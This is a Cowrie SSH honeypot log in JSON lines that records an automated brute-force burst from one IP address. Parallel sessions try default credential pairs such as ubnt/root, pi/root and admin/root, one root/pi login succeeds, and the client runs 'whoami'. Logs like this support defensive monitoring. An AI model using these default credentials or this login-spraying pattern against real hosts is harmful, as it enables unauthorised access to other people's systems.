{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.309082Z","src_ip":"212.227.125.160","session":"d68ebf8c032c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.315499Z","src_ip":"212.227.125.160","session":"47f6047ec0b3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.324836Z","src_ip":"212.227.125.160","session":"c4b64f530d38"}
{"eventid":"cowrie.login.failed","username":"student","password":"root","message":"login attempt [student/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.527074Z","src_ip":"212.227.125.160","session":"47f6047ec0b3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"root","message":"login attempt [ubnt/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.534988Z","src_ip":"212.227.125.160","session":"f848a8e917f5"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.541896Z","src_ip":"212.227.125.160","session":"d68ebf8c032c"}
{"eventid":"cowrie.login.failed","username":"noc","password":"root","message":"login attempt [noc/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.557678Z","src_ip":"212.227.125.160","session":"99eb28dd9e31"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.560968Z","src_ip":"212.227.125.160","session":"c4b64f530d38"}
{"eventid":"cowrie.login.failed","username":"pi","password":"root","message":"login attempt [pi/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.606093Z","src_ip":"212.227.125.160","session":"ea5c75ec7181"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root","message":"login attempt [admin/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.607338Z","src_ip":"212.227.125.160","session":"d416bf707678"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.614139Z","src_ip":"212.227.125.160","session":"75dcc5cce3a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49746,"dst_ip":"1.2.3.4","dst_port":22,"session":"65ef601acd84","protocol":"ssh","message":"New connection: 212.227.125.160:49746 (1.2.3.4:22) [session: 65ef601acd84]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.675696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.713140Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.760483Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.login.success","username":"root","password":"pi","message":"login attempt [root/pi] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.947755Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49752,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0d9d575f71d","protocol":"ssh","message":"New connection: 212.227.125.160:49752 (1.2.3.4:22) [session: c0d9d575f71d]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.052941Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:38.550183Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.551018Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.553206Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.553973Z","src_ip":"212.227.125.160","session":"c0d9d575f71d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.624114Z","src_ip":"212.227.125.160","session":"99eb28dd9e31"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.631931Z","src_ip":"212.227.125.160","session":"d68ebf8c032c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.635486Z","src_ip":"212.227.125.160","session":"f848a8e917f5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.642705Z","src_ip":"212.227.125.160","session":"47f6047ec0b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.647395Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.648391Z","src_ip":"212.227.125.160","session":"65ef601acd84"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.651774Z","src_ip":"212.227.125.160","session":"c4b64f530d38"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.676610Z","src_ip":"212.227.125.160","session":"d416bf707678"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.684561Z","src_ip":"212.227.125.160","session":"ea5c75ec7181"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54904,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd9f9c99a42f","protocol":"ssh","message":"New connection: 212.227.125.160:54904 (1.2.3.4:22) [session: dd9f9c99a42f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.688255Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54906,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f4c1777eccb","protocol":"ssh","message":"New connection: 212.227.125.160:54906 (1.2.3.4:22) [session: 5f4c1777eccb]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.697685Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54922,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fdbf8eb092e","protocol":"ssh","message":"New connection: 212.227.125.160:54922 (1.2.3.4:22) [session: 6fdbf8eb092e]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.698455Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54934,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d4c58410947","protocol":"ssh","message":"New connection: 212.227.125.160:54934 (1.2.3.4:22) [session: 4d4c58410947]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.699185Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54936,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3df5e4df658","protocol":"ssh","message":"New connection: 212.227.125.160:54936 (1.2.3.4:22) [session: b3df5e4df658]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.701633Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54940,"dst_ip":"1.2.3.4","dst_port":22,"session":"616030320564","protocol":"ssh","message":"New connection: 212.227.125.160:54940 (1.2.3.4:22) [session: 616030320564]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.711836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.722729Z","src_ip":"212.227.125.160","session":"5f4c1777eccb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.732399Z","src_ip":"212.227.125.160","session":"4d4c58410947"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.734196Z","src_ip":"212.227.125.160","session":"dd9f9c99a42f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.734998Z","src_ip":"212.227.125.160","session":"dd9f9c99a42f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54948,"dst_ip":"1.2.3.4","dst_port":22,"session":"526695486287","protocol":"ssh","message":"New connection: 212.227.125.160:54948 (1.2.3.4:22) [session: 526695486287]","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.736992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.737619Z","src_ip":"212.227.125.160","session":"6fdbf8eb092e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.756791Z","src_ip":"212.227.125.160","session":"616030320564"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.758546Z","src_ip":"212.227.125.160","session":"616030320564"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.763242Z","src_ip":"212.227.125.160","session":"b3df5e4df658"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.763895Z","src_ip":"212.227.125.160","session":"b3df5e4df658"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.770474Z","src_ip":"212.227.125.160","session":"4d4c58410947"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.771540Z","src_ip":"212.227.125.160","session":"526695486287"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:38.782976Z","src_ip":"212.227.125.160","session":"6fdbf8eb092e"}
